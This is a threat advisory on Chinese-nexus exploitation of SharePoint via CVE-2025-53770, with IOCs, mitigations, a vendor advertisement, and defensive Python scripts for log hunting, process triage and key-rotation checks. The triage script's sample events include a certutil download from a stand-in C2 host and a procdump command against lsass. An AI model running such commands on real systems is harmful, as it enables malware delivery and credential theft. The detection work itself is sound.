Executive Summary
A critical vulnerability in Microsoft SharePoint Server (tracked as CVE-2025-53770 and part of the “ToolShell” chain) has been actively exploited by multiple China-aligned threat actors, including Linen Typhoon, Violet Typhoon and Storm-2603. The flaw enables unauthenticated remote code execution and authentication bypass on on-premises SharePoint servers, and has been tied to a wave of espionage and persistent-access campaigns targeting governments, telecom companies, universities and financial firms across Africa, South America, the Middle East and the U.S. The attackers dropped web shells (e.g. spinstall0.aspx), then deployed side-loaded backdoors including Zingdoor, ShadowPad and KrustyLoader, and chained known techniques such as CVE-2021-36942 (PetitPotam) for domain compromise. Immediate patching of vulnerable SharePoint servers, rotation of machine keys, and hunting for web shell indicators are strongly advised.
Background on ToolShell Campaign
The “ToolShell” campaign refers to exploitation of Microsoft SharePoint servers by advanced Chinese-nexus actors, using a chain of vulnerabilities beginning with CVE-2025-49704 and CVE-2025-49706, with the fix then bypassed via CVE-2025-53770. These actors gained initial access, harvested cryptographic key material (ValidationKey, DecryptionKey, CompatibilityMode) via spinstall0.aspx web shells, then forged ViewState payloads, escalated privileges with the PetitPotam NTLM relay technique (CVE-2021-36942) and executed backdoors for long-term access. Targets included a Middle Eastern telecom provider, African government departments, a U.S. university, South American agencies and a European financial firm.
Vulnerability Details
CVE-ID: CVE-2025-53770
CVSS Score: 9.8 (Critical)
EPSS Score: 86.41%
Vulnerability Type: Deserialization of untrusted data + authentication bypass (SharePoint Server)
Affected Software: Microsoft SharePoint Server (on-premises) up to patched build July 2025
Patched in: Microsoft July 2025 update; however, bypasses were observed soon thereafter, indicating that vulnerable variants remained.
Root Cause: SharePoint’s Layouts/15 endpoint (/_layouts/15/ToolPane.aspx) accepts authenticated or unauthenticated POST requests that drop spinstall0.aspx, extract the cryptographic machine keys, and then forge ViewState values for subsequent RCE.
Infection Method
The observed ToolShell campaign follows this sequence:
- Initial Access: The attacker sends a crafted HTTP POST to `/_layouts/15/ToolPane.aspx` on a flawed SharePoint instance, dropping the `spinstall0.aspx` web shell.
- Key Extraction & Persistence: The web shell extracts `ValidationKey`, `DecryptionKey` and `CompatibilityMode` from the machine keys and stores them for forging ViewState payloads.
- Exploitation & Side-Loading: After gaining persistence, the attacker side-loads legitimate executables (Trend Micro, Bitdefender) to deploy Zingdoor (Go-based backdoor), ShadowPad and KrustyLoader (Rust-based loader), and launches open-source post-exploitation frameworks such as Sliver.
- Privilege Escalation & Movement: PetitPotam and other NTLM/LSASS relay techniques are used to compromise domain controllers and move laterally across the enterprise.
- Reconnaissance & Exfiltration: Living-off-the-land (LoTL) tools such as `Certutil`, `GoGo Scanner` and `Revsocks`, together with encoded PowerShell commands, are used to download/upload data and maintain stealth.
- Long-term Persistence & Espionage: Maintaining stealthy access and harvesting credentials and central data while blending into the environment.
Malware Behavior and Capabilities
The campaign uses an advanced tool suite with these capabilities:
- Web Shell Deployment: `spinstall0.aspx`, which executes commands, uploads files, and extracts machine keys.
- Key Extraction & ViewState Forging: Attackers harvested `ValidationKey`, `DecryptionKey` and `CompatibilityMode` and then forged ViewState payloads for persistent RCE.
- Backdoors & Loaders: Zingdoor (Go), ShadowPad and KrustyLoader (Rust), dropped via side-loading.
- NTLM Relay / Domain Compromise: Use of CVE-2021-36942 (PetitPotam) to escalate privileges and take over domain infrastructure.
- LoTL Tools & Obfuscation: Utilities such as `Certutil`, `Revsocks` and `GoGo Scanner`, and `ProcDump`, `Minidump` and `LsassDumper` to dump credentials and maintain stealth.
- Global Targeting & Multi-Sector Reach: The campaign impacted the telecom, government, education and finance sectors across multiple continents.
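The behaviours listed above map directly onto process-creation telemetry. As an added illustration (constructed example code, not tooling from this report or from any vendor it names), the Python below triages sample Sysmon-style process events for the patterns the report describes: a vendor-named binary running outside its install path or spawning a shell (side-loading), the IIS worker `w3wp.exe` spawning PowerShell (web shell execution), encoded PowerShell, `certutil` download/decode usage, and `lsass` named on a command line. The event field names, the vendor name hints, the trusted path roots and the sample events are all assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\TrendMicroUpdate\TrendMicroUpdate.exe",
     "image": r"C:\Program Files\TrendMicroUpdate\helper.exe", "cmdline": "helper.exe"},
    {"id": 2, "parent": r"C:\Users\Public\Music\TrendMicroUpdate.exe",   # vendor-named copy in a user-writable path
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://c2.example.invalid/x x"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\tools\procdump64.exe", "cmdline": "procdump64.exe -ma lsass.exe out.dmp"},
    {"id": 5, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand <base64 omitted>"},
    {"id": 6, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Assumptions: interpreters an AV binary or IIS worker should never spawn, vendor name
# fragments taken from the vendors named in the report, and the install roots we trust.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
VENDOR_HINTS = ("trendmicro", "trend micro", "bitdefender")
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")


def _basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _looks_vendor(path):
    return any(hint in path.lower() for hint in VENDOR_HINTS)


def triage_event(ev):
    """Return the list of rule names this single event trips (empty if benign)."""
    hits = []
    parent, image, cmd = ev["parent"], ev["image"], ev["cmdline"]
    parent_low = parent.lower().replace("/", "\\")

    # Side-loading: vendor-named binary living outside its install path.
    if _looks_vendor(parent) and not parent_low.startswith(TRUSTED_ROOTS):
        hits.append("vendor_binary_outside_install_path")
    # "Unusual child process of AV vendor executables".
    if _looks_vendor(parent) and _basename(image) in SHELL_IMAGES:
        hits.append("av_vendor_spawned_shell")
    # Web shell execution: the IIS worker process launching an interpreter.
    if _basename(parent) == "w3wp.exe" and _basename(image) in SHELL_IMAGES:
        hits.append("webserver_spawned_shell")
    # LoTL download/decode via certutil.
    if _basename(image) == "certutil.exe" and re.search(r"(?i)-(urlcache|decode)\b", cmd):
        hits.append("certutil_download_or_decode")
    # Any tool other than lsass itself naming lsass on its command line.
    if "lsass" in cmd.lower() and _basename(image) != "lsass.exe":
        hits.append("lsass_access_in_cmdline")
    # Encoded PowerShell: -e, -ec, -enc or -EncodedCommand.
    if _basename(image) in ("powershell.exe", "pwsh.exe") and \
            re.search(r"(?i)\s-e(c|nc|ncodedcommand)?(\s|$)", cmd):
        hits.append("encoded_powershell")
    return hits


def triage(events):
    """Map event id -> rule hits, keeping only events that tripped at least one rule."""
    result = {}
    for ev in events:
        hits = triage_event(ev)
        if hits:
            result[ev["id"]] = hits
    return result


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The rules are deliberately narrow so that each hit names one behaviour from the report; in production you would key the vendor check on signer and expected install path rather than on a filename fragment, since an attacker chooses the filename.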
Techniques Include (MITRE ATT&CK Mapping)
- T1190 – Exploit Public-Facing Application: Exploitation of the SharePoint endpoint `/_layouts/15/ToolPane.aspx`.
- T1210 – Exploitation of Remote Services: Use of SharePoint endpoints and side-loader DLLs.
- T1078 – Valid Accounts: Side-loaded tools executing as trusted binaries.
- T1059.001 – PowerShell: Use of Base64-encoded PowerShell commands to drop `spinstall0.aspx`.
- T1027 – Obfuscated Files or Information: Tools using side-loading, hidden executables disguised as legitimate AV vendors.
- T1003 – OS Credential Dumping: Using `ProcDump`, `Minidump` and `LsassDumper`.
- T1213 – Data from Information Repositories: Extracting `ValidationKey` and `DecryptionKey` from machine keys.
- T1498 – Network Denial of Service: Not primary, but a possibility in espionage campaigns to degrade defenses.
- T1574 – Hijack Execution Flow: DLL side-loading of trusted software to deploy backdoors.
Visual: ToolShell Attack Flow
[Internet-exposed SharePoint Server]
-> [HTTP POST to /_layouts/15/ToolPane.aspx -> drop spinstall0.aspx]
-> [Extract machine-keys (ValidationKey, DecryptionKey, CompatibilityMode)]
-> [Forge ViewState payload + drop Zingdoor/ShadowPad/KrustyLoader via side-load]
-> [Run PetitPotam (CVE-2021-36942) to relay LSASS -> domain compromise]
-> [Deploy LoTL utilities (Certutil, Revsocks, GoGo Scanner)]
-> [Persistence & credential theft across telecom / gov / education networks]
IOCs (Indicators of Compromise)
- Web shells: `spinstall0.aspx` in the SharePoint `TEMPLATE\LAYOUTS\15` directory.
- Side-loaded executables originally named after AV vendors (Trend Micro, Bitdefender) but launching Zingdoor/ShadowPad/KrustyLoader.
- CVE-2021-36942 (PetitPotam) indicators: unusual NTLM relays, `lsass.exe` minidumps.
- Unusual outbound connections to unknown C2 domains following initial access.
- Abnormal POST requests to the SharePoint `/_layouts/15/ToolPane.aspx` endpoint from unknown IP ranges.
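The two request-level indicators above (POSTs to `ToolPane.aspx` from unknown ranges, and any request for `spinstall0.aspx`) can be hunted straight out of IIS W3C logs. The following is an added example written for this page, not tooling from the report: it parses the `#Fields:` header so the column order does not matter, then flags the two patterns. The log excerpt, the field layout and the "known admin" network list are constructed assumptions; substitute your own log path and the ranges your administrators actually use.

```python
import ipaddress

# Constructed IIS W3C log excerpt (not real telemetry). Column order comes from #Fields.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 10:01:02 10.0.0.5 GET /sites/hr/default.aspx - 443 CORP\\jdoe 10.0.20.14 Mozilla/5.0 - 200
2025-07-19 10:02:10 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.77 Mozilla/5.0 - 200
2025-07-19 10:02:11 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.77 Mozilla/5.0 - 200
2025-07-19 10:05:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 CORP\\spadmin 10.0.20.14 Mozilla/5.0 - 200
"""

# Assumption: the only ranges from which ToolPane.aspx POSTs are expected (admin network).
KNOWN_ADMIN_NETS = [ipaddress.ip_network("10.0.20.0/24")]

TOOLPANE_SUFFIX = "/_layouts/15/toolpane.aspx"
WEBSHELL_NAME = "spinstall0.aspx"


def parse_w3c(log_text):
    """Yield (line_number, record_dict) for each data line, honouring #Fields headers."""
    fields = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        yield lineno, dict(zip(fields, line.split()))


def hunt(log_text, admin_nets=KNOWN_ADMIN_NETS):
    """Return [(line_number, rule, client_ip)] for requests matching the report's IOCs."""
    findings = []
    for lineno, rec in parse_w3c(log_text):
        stem = rec.get("cs-uri-stem", "").lower()
        client = ipaddress.ip_address(rec["c-ip"])
        trusted = any(client in net for net in admin_nets)
        # Rule 1: POST to ToolPane.aspx from outside the known admin ranges.
        if rec.get("cs-method") == "POST" and stem.endswith(TOOLPANE_SUFFIX) and not trusted:
            findings.append((lineno, "toolpane_post_from_unknown_ip", str(client)))
        # Rule 2: any request that touches the web shell path, whoever sent it.
        if WEBSHELL_NAME in stem:
            findings.append((lineno, "webshell_path_requested", str(client)))
    return findings


if __name__ == "__main__":
    for lineno, rule, ip in hunt(SAMPLE_LOG):
        print(f"line {lineno}: {rule} from {ip}")
```

Rule 1 is suppressed for trusted ranges only to cut noise from legitimate page editing; during an incident, run it with an empty allowlist as well, since a compromised admin workstation would otherwise hide behind it.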
Threat Actor Attribution
While no single group is definitively attributed publicly beyond Microsoft’s initial tri-group disclosure, analysis points to multiple China-nexus actors: Linen Typhoon (aka Budworm), Violet Typhoon (aka Sheathminer), Storm-2603 (ransomware-linked) and Salt Typhoon (aka Glowworm) all exploited ToolShell. The campaign’s global scale, breadth of sectors targeted, use of sophisticated loaders, and credential harvesting suggest a state-aligned espionage objective rather than pure financially-motivated crime.
Mitigation Steps
- Rotate Machine Keys: After patching, rotate the `ValidationKey`, `DecryptionKey` and `CompatibilityMode` in the `web.config` of SharePoint instances.
- Harden Access: Restrict access to the SharePoint Admin and Layouts directories; enforce MFA for administrative access; isolate internet-facing instances behind a VPN or jump hosts.
- Hunt for IOCs: Search for `spinstall0.aspx`, web shell detections, POST requests to `/_layouts/15/ToolPane.aspx`, and side-loaded binaries mimicking AV vendors.
- Monitor for LoTL Tools: Detect usage of `Certutil`, `GoGo Scanner`, `Revsocks`, `ProcDump`, `Minidump` and `LsassDumper`, or signs of PetitPotam relays.
- Enhance Threat Detection: Use EDR to flag “unusual child process of AV vendor executables”, “creation of web shell under Layouts folder”, and “machine-key extraction”.
- Segment & Micro-Segment: Place SharePoint servers in restricted network zones; apply least-privilege network and firewall policies to limit lateral movement.
- Incident Response Playbook: If compromise is suspected, isolate the server, collect memory for machine-key material, perform forensic imaging of `TEMPLATE\LAYOUTS\15`, and coordinate with national-level incident response entities.
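Key rotation is the step most often declared done without being verified: a stolen `ValidationKey` keeps working until the value in `web.config` actually changes. As an added example (constructed for this page, not a SharePoint or Microsoft tool), the Python below reads the `<machineKey>` element, records a SHA-256 fingerprint of each key before the rotation, and afterwards confirms that the fingerprints changed, that the keys are not `AutoGenerate`, and that the algorithms and key lengths are not weak. The `web.config` fragments and the dummy hex keys are constructed; the minimum key lengths are assumed floors chosen for the example, not a Microsoft requirement.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed web.config fragments with dummy keys (not real SharePoint configuration).
_TEMPLATE = """<configuration>
  <system.web>
    <machineKey validationKey="{v}" decryptionKey="{d}"
                validation="{va}" decryption="{da}" compatibilityMode="Framework45" />
  </system.web>
</configuration>"""

OLD_WEB_CONFIG = _TEMPLATE.format(v="0123456789ABCDEF" * 8, d="00112233445566778899AABBCCDDEEFF" * 2,
                                  va="HMACSHA256", da="AES")
NEW_WEB_CONFIG = _TEMPLATE.format(v="FEDCBA9876543210" * 8, d="FFEEDDCCBBAA99887766554433221100" * 2,
                                  va="HMACSHA256", da="AES")
WEAK_WEB_CONFIG = _TEMPLATE.format(v="ABCDEF0123456789" * 2, d="0011223344556677",
                                   va="SHA1", da="3DES")

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}
# Assumed floors: 32-byte HMAC key and 16-byte AES key, expressed in hex characters.
MIN_HEX_LEN = {"validationKey": 64, "decryptionKey": 32}


def fingerprint(secret):
    """Short SHA-256 fingerprint so key material never has to be written into a ticket."""
    return hashlib.sha256(secret.encode("ascii")).hexdigest()[:16]


def read_machine_key(xml_text):
    root = ET.fromstring(xml_text)
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        raise ValueError("no <machineKey> element found")
    return dict(mk.attrib)


def record_fingerprints(xml_text):
    """Run this BEFORE rotating: returns {attribute: fingerprint} for the current keys."""
    mk = read_machine_key(xml_text)
    return {a: fingerprint(mk[a]) for a in ("validationKey", "decryptionKey") if a in mk}


def check_rotation(xml_text, pre_incident):
    """Run this AFTER rotating: returns a list of findings (empty means the rotation checks out)."""
    mk = read_machine_key(xml_text)
    findings = []
    for attr, min_len in MIN_HEX_LEN.items():
        value = mk.get(attr, "")
        if not value or value.startswith("AutoGenerate"):
            findings.append(f"{attr}: not an explicit key; rotation cannot be verified")
            continue
        if fingerprint(value) == pre_incident.get(attr):
            findings.append(f"{attr}: NOT rotated (matches pre-incident fingerprint)")
        if len(value) < min_len:
            findings.append(f"{attr}: only {len(value)} hex chars, below assumed floor of {min_len}")
    if mk.get("validation", "").upper() not in STRONG_VALIDATION:
        findings.append(f"validation={mk.get('validation')}: expected an HMAC-SHA2 algorithm")
    if mk.get("decryption", "").upper() != "AES":
        findings.append(f"decryption={mk.get('decryption')}: expected AES")
    return findings


if __name__ == "__main__":
    before = record_fingerprints(OLD_WEB_CONFIG)
    for label, cfg in (("unchanged", OLD_WEB_CONFIG), ("rotated", NEW_WEB_CONFIG), ("weak", WEAK_WEB_CONFIG)):
        print(label, check_rotation(cfg, before) or ["OK"])
```

Because ViewState must validate on every server in a farm, the same check belongs on each server's `web.config` for each web application; a single unrotated copy leaves the old key usable.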
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
